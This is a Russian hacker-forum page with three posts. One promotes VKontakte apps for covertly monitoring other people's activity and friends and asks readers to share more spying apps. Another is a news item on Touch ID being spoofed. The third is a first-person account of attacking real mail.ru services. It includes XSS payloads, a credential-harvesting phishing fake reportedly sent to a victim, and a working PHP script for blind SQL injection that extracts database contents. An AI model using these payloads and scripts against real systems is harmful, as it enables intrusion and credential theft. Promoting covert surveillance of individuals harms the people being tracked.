комментарии и обсуждения Приятные мелочи: ✓ Режим невидимка: никто не видит, что вы online ✓ Режим нечиталка: собеседник не видит, что вы прочитали сообщение ✓ Мультиаккаунт. Можно подключить несколько ( до 4-х ) аккаунтов. ✓ Возможность задать свой фон для сообщений ✓ Блокировка запуска приложения паролем ✓ Сохранение всех фото альбома за раз ✓ В переписке сразу отображаются вложения ✓ Просмотр материалов беседы ✓ Двухфакторная авторизация (подтверждение входа по СМС) Массовое удаление: ✓ Выбранных групп прямо из списка, можно удалить все группы сразу ✓ Подписок прямо из списка интересных страниц ✓ Людей и ссылок из закладок ✓ Фотографий в альбоме ✓ Сообщений и диалогов Offline режим: Все страницы, которые вы посетили недавно доступны без подключения к интернет. • Стены друзей и групп • Диалоги и сообщения • Обсуждения • Новости Гости ВК: Многие просят добавить просмотр кто заходил в гости на страницу. К сожалению это не возможно. Все программы, которые якобы предоставляют такую возможность, всего лишь показывают тех, кто поставил лайк или написал у вас на стене. Это вы можете увидеть и у нас в программе в разделе "Мои ответы". Музыка VK: Приложение не предоставляет доступа к музыке ВКонтакте Видео VK: Приложение не предоставляет доступа к видео ВКонтакте https://play.google.com/store/apps/details?id=com.dchistyakov.vkmessenger.ui 2. Узнавайте секреты ваших друзей и знакомых в социальной сети ВКонтакте. - Вы легко узнаете, кому ваша девушка или парень ставит лайки. - Приложение оповестит, когда нужный человек зашел в сеть. - Узнаете скрытых друзей. - Найдете фотографии, на которых отмечен тот или иной человек. - Подскажет, кто кого удалил или добавил в друзья. - Работает в режиме невидимка Приложение использует открытые методы социальной сети ВКонтакте, поэтому вся информация добывается законным путем. https://play.google.com/store/apps/details?id=ru.flerov.vksecrets 3. Друзья и гости ВКонтакте. Первая бета. Хотите узнать кто посещал Вашу страницу?! Наше приложение будет следить за изменениями Ваших друзей ВКонтакте и показывать кто и когда посещал Вашу страницу. Гости Вашей страницы Вконтакте: Желаете узнать кто просматривал Вашу страницу на VK.com? Легко! Наш сервис делает глубокий анализ Вашей страницы Вконтакте и показывает уже более 60% Ваших гостей Кто удалил Вас из друзей: Вконтакте не дает возможности следить за тем, кто и когда удалил Вас из списка друзей. Мы это сделаем для Вас! Слежка: Смотрите когда и кого интресующий Вас человек добавляет и удаляет из друзей. Следить можно за любым пользователем ВК, для этого не обязательно его/ее другом или подписчиком. Новые друзья: Будьте всегда в курсе кто добавился к Вам в друзья или подтвердил Вашу заявку. Несколько пользователей: Используйте Наш сервис сразу под несколькими пользователями Вконтакте. Бесплатно: Как и другие Наши сервисы все возможности абсолютно бесплатны для Вас. Гарантии: Наш сервис легален и не содержит каких либо подвохов или поддельных шпионов которые блокирует администрация vk.com! Гарантией выступает наша репутация на мобильном рынке с 2006г. В следующих обновлениях мы планируем увеличить % охвата гостей Вашей страницы Вконтакте! https://play.google.com/store/apps/details?id=mobi.myvk 4. VK iHA bot создан для того, чтобы автоматически отвечать и развлекать посетителей Вашей страницы. Идея написания этой программы появилась у меня после посещения группы iHateApple, где было бы очень удобным наличие возможности круглосуточно отвечать на неадекватные однотипные сообщения тупых яблодрочеров. Так появилась первая версия, и она народу понравилась. Потом я добавил сюда понятие позитивныхнегативных шаблонов, потом начал копать в направлении нейросетей и мне удалось написать самообучающегося бота. Со временем программа усложнялась, и сейчас мы имеем то, что имеем, и надеюсь, тебе нравится! https://play.google.com/store/apps/details?id=com.fsoft.vktest 5. Вы случайно удалили важные сообщения? С помощью этого приложения Вы сможете совершенно бесплатно проверить, удалялись ли сообщения и попробовать их восстановить! Приложение работает только с ВКонтакте через Онлайн-Сервис DelMsg. Приложение позволяет увидеть количество удаленных сообщений за выбранный период. В течении 2-х дней, после удаления, возможно получить информацию, с кем была удалена переписка. В течении 20 минут возможно восстановить удаленные сообщения. ВАЖНО: после удаленных сообщений, должно быть хотя-бы одно не удаленное. В: Как проверить аккаунт другого пользователя? О: Необходимо войти в программу через его аккаунт ВКонтакте. Можно проверять только те аккаунты, к которым имеете доступ. В: Почему очень малый срок для восстановления сообщений? О: Это особенность сайта ВКонтакте. Пока не найден способ восстанавливать старые сообщения. В: Безопасно ли это? О: Приложение работает через защищенное https соединение с сервером ВКонтакте. Все ваши данные шифруются и передаются только на сервер ВКонтакте. В: Что значит "С информацией"? О: Это количество сообщений, по которым доступна информация о том кем и кому они были написаны. Только такие сообщения возможно попытаться восстановить. В: Удалил свое последнее сообщение, но программа его не показывает. О: Чтоб программа показала более достоверную информацию, необходимо, чтобы после последнего удаленного сообщения было хотя-бы одно не удаленное. В: Что необходимо указывать в диапазоне? О: В диапазоне указывается дата, когда это сообщение было получено/отправленно. https://play.google.com/store/apps/details?id=com.sundrey.delmsg ДУМАЮ НА ЭТОМ ПОКА ХВАТИТ! ДЕЛАЙТЕ ВЫВОДЫ И БУДЬТЕ ОСТОРОЖНЕЕ ЕСЛИ ВАМ ВАЖНА ВАША КОНФИДЕНЦИАЛЬНОСЬ! ДУМАЮ НАШ ФОРУМ ПРОФЕССИОНАЛЬНОГО ХАКЕРА XAKERSAY РАЗВЕЕЛ МИФ О БЕЗОПАСНОСТИ И КОНФИДЕНЦИАЛЬНОСИ СЕТИ ВКОНТАКТЕ))) ЛИЧНЫЙ МОЙ СОВЕТ ВАМ УВАЖАЕМЫЕ ЧИТАТЕЛИ, НЕТ НЕТ ПРОВОДИТЕ МОНИТОРИНГ ГУГЛА ПЛЕЙ) БЫВАЮТ ТАМ ПОЛЕЗНЫЕ ТАК НАЗЫВАЕМЫЕ ХАКЕРСКИЕ ПРОГРАММЫ. ДРУЗЬЯ ОТДЕЛЬНАЯ ПРОСЬБА ОТ ФОРУМА ПРОФЕССИОНАЛЬНЫХ ХАКЕРОВ, БУДЬТЕ ДОБРЫ У КОГО ПОЯВЯТСЯ ПОДОБНЫЕ ПРОГРАММЫ ДЛЯ СЛЕЖКИ ВЫКЛАДЫВАЙТЕ СЮДА В КОММЕНТАРИИ К ЭТОЙ ТЕМЕ. СПАСИБО ЧТО ВЫ С НАМИ. С УВАЖЕНИЕМ АДМИНИСТРАЦИЯ ФОРУМ ПРОФЕССИОНАЛЬНЫХ ХАКЕРОВ И ПРОГРАММИСТОВ, СЛЕДИТЕ ЗА НОВОСТЯМИ XAKERSAY.
- 2 replies
-
- опытные хакеры
- профессиональные хакеры
- (and 12 more)
-
Хакеры сумели обмануть Touch ID
Admin posted a question in About professional hackers (ARTICLES AND STORIES).
Apple уже сейчас думает, как бы сделать идентификацию пользователя более надежной, однако хакеры ее поторапливают: решение должно быть найдено в ближайшее время — взломать систему распознавания лиц по отпечаткам их пальцев легко. В частности, на днях «взломщики» из группы Chaos Computer Club сообщили, что сумели обмануть технологию, приложив к датчику под кнопкой «Домой» всего лишь несколько фотоснимков. Хакер, известный как Ян Крисслер или Starbug, рассказал, что сумел подделать отпечатки пальцев министра обороны Германии Урсулы Фон Дер Лайен. Для этого он использовал ПО VeriFinger и несколько фотографий пальца министра, снятых крупным планом и с разных углов (и где только такие нашел!). Хакер отметил, что подобное развенчивает мифы о безопасности Touch ID. Напомним, что случай с пальцем политика — не единственный камень в огород защищенности iPhone. Ранее хакеры упрекали систему в том, что она распознает модельки пальцев, сделанные из латекса. Технология Touch ID, позволяющая выявлять хозяина телефона по отпечаткам пальцев, была представлена вместе с iPhone 5s, на данный момент ею оснащены также iPhone 6, iPhone 6 Plus, iPad Air 2 и iPad mini 3. Если у вас есть хоть один из них, имеет смысл не разрешать посторонним товарищам снимать ваши руки, острят СМИ. Читайте XAKERSAY Форум профессиональных хакеров-
- хакеры
- профессиональные хакеры
- (and 9 more)
-
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у мэйла есть много других сервисов помимо почтового, в строке запроса я написал: site:*mail.ru. В ответ гугль вывалил 20 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры mail.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.mail.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: http://7ya.mail.ru/image.php?in=phot...=500&big_h=375 Я решил его подкорректировать, получилось вот что: http://7ya.mail.ru/image.php?in=">Russian Net Hunters - Rulezzz Как видишь получилось - Russian Net Hunters Rulezzz. Одним из последних сервисов был форумы@mail.ru, я попробовал скуль-инжекшн через форму авторизации, но меня редиретнуло на страницу, в которой говорилось, что я не зарегистрирован, и тут мое внимание привлекла адресная строка: http://talk.mail.ru/login.html?target= Я решил проверить переменную target на XSS, набрав в адресной строке http://talk.mail.ru/login.html?target="> Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный юзер решит, что произошли какие-нить сбои в работе службы DNS. [testing...] Для проверки всего сказанного я написал "жалостливое" письмо своей новой подружке от бедных админов [email protected] c просьбой кликнуть по ссылке... и вскоре в файле logs.txt появилась новая строчка... На следующий день pixcher нашел sql-inj: http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' Ошибка выполнения запроса! SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = 0 AND singer_id = '9'' You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 1 Я не поверил своим глазам, но после нажатия на кнопку REFRESH баг не исчез =) Запрос к БД на число мелодий по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда я заметил, что запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' or 1=1/* выполняется и выдаёт нам кучу мелодий на скачивание, а запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' or 1=2/* выдаёт 0 => никакого списка рингтонов не отображает =), а это значит то, что можно посимвольно брутить поля базы данных! Для начало попробуем сбрутить имя пользователя БД user(). SQL функция substring(user(),1,1) выдёргивает из строки user() первый символ, а функция lower(substring(user(),1,1)) ещё и переводит его в нижний регистр. Запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' AND lower(substring(user(),1,1))="a"/* не выдал ни одного рингтона - а значит первая буква пользователя БД не "a" =(. Первый символ я подобрал вручную, запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' AND lower(substring(user(),1,1))="i"/* выдавал мне полный перечень музона и я понял, что для облегчения этого беспонтового ручного перебора нужно писать скрипт... Наш скрипт должен скачивать страницу, меняя в запросе ="a" на остальные символы английского алфавита и если в теле скаченной страницы присутствует наш список мелодий (практическим путём было выяснено, что такая страница содержит волшебное число 17107 ), то скрипт должен показать нам этот символ и перейти к поиску второго символа, то есть выполняя запросы, содержащие substring(user(),2,1) и т.д. Не долго думая я запусти блокнот и начал вбивать в него до боли знакомые строки любимого PHP. У меня получилось примерно так: # Скрипт для посимвольного брута полей БД by pixcher (http://runthes.ru) set_time_limit(0); // пусть наш скрипт не обламывается, если перебор затягивается на длительное время $find="user()";# Искомая строка (здесь может быть любое поле БД в виде подзапроса) $bruteline ='qwertyuiopasdfghjklzxcvbnm1234567890_+!@#$%^&* '"()';# Предполагаем, что исходная строка состоит только из этих символов $k=1;# Номер символа, который мы брутим (изначально первый =)) # Далее идёт функция для скачивания веб странички, адрес которой передаётся ей в параметре function get_page ($link){ $url = parse_url ($link); $scr = $url['path']; $scr .= ($url['query'] > "")?"?".$url['query']:""; $scr .= ($url['fragment'] > "")?"#".$url['fragment']:""; $host .= $url['host']; $port = ($url['port'] > "")?$url['port']:80; $sock = fsockopen ($host, $port); fputs ($sock, "GET /$scr HTTP/1.0rnHost: $hostrnrn"); $cont = ""; while (!feof ($sock)) { $cont .= fgets ($sock); } fclose ($sock); return $cont; } for ($i=0;$i$link="http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9'%20AND%20lower(substri ng($find,$k,1))="$bruteline[$i]"/*";# Динамически изменяющийся запрос =) $page=get_page($link);# Скачиваем страницу if(strstr($page, "17107")){ # ...и если она содержит магическое число 17107... echo "$bruteline[$i]"; # ...показываем найденный символ... $i=0; # ...начинаем перебор заново... $k++; # ...но для следующего символа }} ?> Запускаем наш скрипт и... видим имя пользователя БД: "[email protected]". Попробуем вместо $find="user()"; перебирать результаты подзапроса, например $find="(SELECT password from mysql.user LIMIT 1)"; Запускаем скрипт, но он выдаёт... эх... подзапросы к сожалению не поддерживаются в почтовой БД =( Ничего страшного, UNION SELECT ещё никто не отменял, так что возможен такой перебор: http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=-9' UNION SELECT 1 FROM mysql.user where user="inform" and lower(substring(password,1,1))="a" но к этому моменту меня уже стало воротить от одной мысли о запросе к БД и я "вдруг" вспомнил, что неправомерный доступ к конфиденциальной информации карается законом =) [end...]
-
- взлом почты
- форум хакеров
- (and 5 more)